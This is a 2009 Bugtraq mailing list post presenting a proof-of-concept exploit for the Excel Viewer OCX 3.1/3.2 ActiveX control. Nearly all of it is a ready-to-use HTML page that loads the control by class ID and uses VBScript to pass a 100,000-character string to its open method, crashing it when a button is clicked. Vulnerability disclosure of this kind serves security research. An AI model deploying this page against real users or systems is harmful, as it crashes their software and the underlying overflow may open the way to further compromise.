|
Bugtraq
mailing list archives
Excel Viewer OCX 3.1/3.2 Denial of Service PoC
From: alphanix00 () gmail com
Date: 16 Jan 2009 21:01:17 -0000
<html>
<title>Excel Viewer OCX 3.1/3.2 Denial of Service PoC</title>
<br> Excel Viewer OCX 3.1/3.2 Denial of Service PoC</br>
<br> By ALpHaNiX </br>
<br> NullArea.Net</br>
<br></br>
<BODY>
<object id=alpha classid="clsid:{18A295DA-088E-42D1-BE31-5028D7F9B965}"></object>
<script language='vbscript'>
Sub Boom
on error resume next
buff = String(100000, "A")
alpha.open buff
alpha.open buff
End Sub
</script>
<input type=button onclick=Boom() value='BooM !'>
</body>
</HTML>
By Date
By Thread
Current thread:
- Excel Viewer OCX 3.1/3.2 Denial of Service PoC alphanix00 (Jan 16)
|